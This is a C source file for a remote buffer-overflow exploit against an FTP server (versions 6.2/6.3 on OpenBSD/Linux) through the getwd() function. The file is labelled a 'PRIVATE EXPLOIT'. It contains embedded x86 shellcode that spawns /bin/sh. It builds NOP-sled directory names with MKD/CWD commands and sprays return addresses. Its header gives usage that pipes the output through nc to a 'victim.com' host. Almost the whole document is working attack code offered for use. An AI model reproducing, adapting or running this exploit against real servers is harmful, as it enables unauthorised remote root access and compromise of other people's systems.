<![CDATA[/*
* FTP server (Version 6.2/OpenBSD/Linux-0.10) and 6.3 ??
* getwd() overflow. linux exploit, remote penetration.
*
* author: DiGiT - teddi@linux.is
*
* greets: p0rtal && \x90 & me for discovering this bug.
* big thx to duke for ADMwuftp.
* #hax,#!ADM
* Run like: (./ftpexp 0 dir ; cat) | nc victim.com 21
* offset vary from -500 - +500
* PRIVATE EXPLOIT$#%#%#$
*/
#include <stdio.h>
#include <string.h>
// need to find for other, tested of slack 3.6.
//#define RET 0xbfffec5c
#define RET 0xbfffeb30
#define USERNAME "ftp"
#define PASSWORD "lamer@"
char shellcode[] =
"\x31\xdb\x89\xd8\xb0\x17\xcd\x80"
"\x90\x90\x31\xc0\x31\xdb\xb0\x17"
"\xcd\x80\x31\xc0\xb0\x17\xcd\x80"
"\x31\xc0\x31\xdb\xb0\x2e\xcd\x80"
"\xeb\x4f\x31\xc0\x31\xc9\x5e\xb0"
"\x27\x8d\x5e\x05\xfe\xc5\xb1\xed"
"\xcd\x80\x31\xc0\x8d\x5e\x05\xb0"
"\x3d\xcd\x80\x31\xc0\xbb\xd2\xd1"
"\xd0\xff\xf7\xdb\x31\xc9\xb1\x10"
"\x56\x01\xce\x89\x1e\x83\xc6\x03"
"\xe0\xf9\x5e\xb0\x3d\x8d\x5e\x10"
"\xcd\x80\x31\xc0\x88\x46\x07\x89"
"\x76\x08\x89\x46\x0c\xb0\x0b\x89"
"\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd"
"\x80\xe8\xac\xff\xff\xff";
void mkd(char *dir)
{
char blah[1024], *p;
int n;
bzero(blah, sizeof(blah));
p = blah;
for(n=0; n<strlen(dir); n++){
if(dir[n] == '\xff'){
*p = '\xff';
p++;
}
*p = dir[n];
p++;
}
printf("MKD %s\r\n", blah);
printf("CWD %s\r\n", blah);
}
void
main (int argc, char *argv[])
{
char *buf;
char buf2[200];
char buf1[600];
char dir2[256];
char *p;
char *q;
char tmp[256];
int a;
int offset;
int i;
if (argc > 1) offset = atoi(argv[1]);
else offset = 0;
fprintf(stderr, "ret-addr = 0x%x\n", RET + offset);
fprintf(stderr, "shell size = %d\n", sizeof(shellcode));
dir2[231] = '\0';
memset(dir2, '\x90', 230);
printf("user %s\r\n", USERNAME);
printf("pass %s\r\n", PASSWORD);
printf("cwd %s\r\n", argv[2]);
memset(buf1, 0x90, 600);
p = &buf1[sizeof(argv[2])];
q = &buf1[599];
*q = '\x00';
while(p <= q) {
strncpy(tmp, p, 100);
mkd(tmp);
p+=100; }
mkd(dir2);
mkd(shellcode);
mkd("bin");
mkd("sh");
memset(buf2, 0x90, 100);
// var 96
for(i=4; i<96; i+=4)
*(long *)&buf2[i] = RET + offset;
p = &buf2[0];
q = &buf2[99];
strncpy(tmp, p, 100);
mkd(tmp);
printf("pwd\r\n");
}
]]>